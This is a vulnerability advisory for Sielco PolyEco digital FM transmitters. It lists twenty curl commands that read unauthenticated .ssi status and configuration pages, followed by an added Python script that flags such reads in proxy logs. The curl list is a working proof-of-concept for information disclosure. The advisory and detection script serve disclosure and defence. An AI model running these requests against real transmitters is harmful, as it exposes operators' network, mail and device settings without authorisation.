Sielco PolyEco Digital FM Transmitter 2.0.6 Information Disclosure
Sielco PolyEco Digital FM Transmitter version 2.0.6 suffers from an information disclosure vulnerability due to improper access control enforcement. An unauthenticated remote attacker can exploit this issue via a specially crafted request to gain access to sensitive information.
Sielco PolyEco Digital FM Transmitter 2.0.6 Unauthenticated Information Disclosure

Vendor: Sielco S.r.l
Product web page: https://www.sielco.org
Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19
                  PolyEco1000 CPU:1.9.4 FPGA:10.19
                  PolyEco1000 CPU:1.9.3 FPGA:10.19
                  PolyEco500  CPU:1.7.0 FPGA:10.16
                  PolyEco300  CPU:2.0.2 FPGA:10.19
                  PolyEco300  CPU:2.0.0 FPGA:10.19

Summary: PolyEco is the innovative family of high-end digital FM transmitters of Sielco. They are especially suited as high performance power system exciters or compact low-mid power transmitters. The same cabinet may in fact be fitted with 50, 100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500, 1000). All features can be controlled via the large touch-screen display 4.3" or remotely. Many advanced features are inside by default in the basic version such as: stereo and RDS encoder, audio change-over, remote-control via LAN and SNMP, "FFT" spectral analysis of the audio sources, SFN synchronization and much more.

Desc: Sielco PolyEco is affected by an information disclosure vulnerability due to improper access control enforcement. An unauthenticated remote attacker can exploit this, via a specially crafted request, to gain access to sensitive information.

Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            Macedonian Information Security Research and Development Laboratory
                            Zero Science Lab - https://www.zeroscience.mk - @zeroscience

Advisory ID: ZSL-2023-5766
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5766.php

26.01.2023

--

$ curl -s http://RADIOFM/factory.ssi
$ curl -s http://RADIOFM/rds.ssi
$ curl -s http://RADIOFM/ip.ssi
$ curl -s http://RADIOFM/alarm.ssi
$ curl -s http://RADIOFM/i2s.ssi
$ curl -s http://RADIOFM/time.ssi
$ curl -s http://RADIOFM/fft.ssi
$ curl -s http://RADIOFM/info.ssi
$ curl -s http://RADIOFM/status.ssi
$ curl -s http://RADIOFM/statusx.ssi
$ curl -s http://RADIOFM/audio.ssi
$ curl -s http://RADIOFM/smtp.ssi
$ curl -s http://RADIOFM/rf.ssi
$ curl -s http://RADIOFM/rfa.ssi
$ curl -s http://RADIOFM/ping.ssi
$ curl -s http://RADIOFM/lan.ssi
$ curl -s http://RADIOFM/kappa.ssi
$ curl -s http://RADIOFM/dbrt.ssi
$ curl -s http://RADIOFM/audiom.ssi
$ curl -s http://RADIOFM/log.ssi
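The list above names the .ssi pages that the transmitter serves without authentication. Because the embedded lwIP web server cannot be patched by the operator, the practical controls are network segmentation and monitoring of who reads those pages. The following detection script is an added example, not part of the advisory and not code from Sielco or Zero Science Lab. It assumes that a reverse proxy, firewall or IDS in front of the transmitter writes requests in Combined Log Format (an assumption; the lwIP server itself keeps no access log), and it flags successful reads of any of the advisory's .ssi pages from sources outside an operator-defined management network. The log lines and the 10.20.0.0/16 management range are constructed for the example.

```python
"""Flag reads of PolyEco .ssi status pages from outside the management network.

Added example for advisory ZSL-2023-5766; the log format, the proxy in front of
the transmitter and the trusted network range are assumptions for illustration.
"""
import ipaddress
import re
from typing import Dict, Iterable, List, Optional

# The twenty .ssi pages the advisory lists as readable without authentication.
SSI_PAGES = frozenset({
    "/factory.ssi", "/rds.ssi", "/ip.ssi", "/alarm.ssi", "/i2s.ssi",
    "/time.ssi", "/fft.ssi", "/info.ssi", "/status.ssi", "/statusx.ssi",
    "/audio.ssi", "/smtp.ssi", "/rf.ssi", "/rfa.ssi", "/ping.ssi",
    "/lan.ssi", "/kappa.ssi", "/dbrt.ssi", "/audiom.ssi", "/log.ssi",
})

# Combined Log Format as written by a reverse proxy or IDS in front of the
# transmitter (assumption: the lwIP web server itself keeps no access log).
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample: two reads from an Internet address, one from the
# management LAN, one non-SSI page, one failed request and one unparsable line.
SAMPLE_LOG = """\
203.0.113.7 - - [26/Jan/2023:10:01:02 +0100] "GET /factory.ssi HTTP/1.1" 200 1842
203.0.113.7 - - [26/Jan/2023:10:01:03 +0100] "GET /lan.ssi?x=1 HTTP/1.1" 200 612
10.20.0.5 - - [26/Jan/2023:10:05:00 +0100] "GET /status.ssi HTTP/1.1" 200 2210
203.0.113.9 - - [26/Jan/2023:10:06:11 +0100] "GET /index.html HTTP/1.1" 200 5120
198.51.100.4 - - [26/Jan/2023:10:07:45 +0100] "GET /log.ssi HTTP/1.1" 404 0
garbage line that does not parse
""".splitlines()

# Assumed management network from which operators legitimately read status pages.
TRUSTED_NETWORKS = ["10.20.0.0/16"]


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Parse one Combined Log Format line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    # Drop any query string so "/lan.ssi?x=1" still matches the page name.
    rec["path"] = rec["path"].split("?", 1)[0]
    return rec


def from_trusted_network(src: str, trusted: Iterable[str]) -> bool:
    """True when the source address falls inside one of the trusted CIDR ranges."""
    try:
        addr = ipaddress.ip_address(src)
    except ValueError:
        return False  # hostnames or malformed fields are never treated as trusted
    return any(addr in ipaddress.ip_network(net, strict=False) for net in trusted)


def flag_ssi_reads(lines: Iterable[str], trusted: Iterable[str]) -> List[Dict[str, str]]:
    """Return the successful (HTTP 200) reads of advisory-listed .ssi pages
    that came from outside the trusted management network."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if (rec["path"] in SSI_PAGES
                and rec["status"] == "200"
                and not from_trusted_network(rec["src"], trusted)):
            findings.append({"src": rec["src"], "path": rec["path"], "ts": rec["ts"]})
    return findings


if __name__ == "__main__":
    for f in flag_ssi_reads(SAMPLE_LOG, TRUSTED_NETWORKS):
        print(f"[ZSL-2023-5766] unauthenticated SSI read: {f['src']} -> {f['path']} at {f['ts']}")
```

Only successful responses are reported, so a 404 for a page a particular firmware does not serve is not an alert; pages fetched from the management range are accepted as normal operator activity. Feed the script a real proxy log instead of SAMPLE_LOG and adjust TRUSTED_NETWORKS to the ranges from which the transmitter is actually administered.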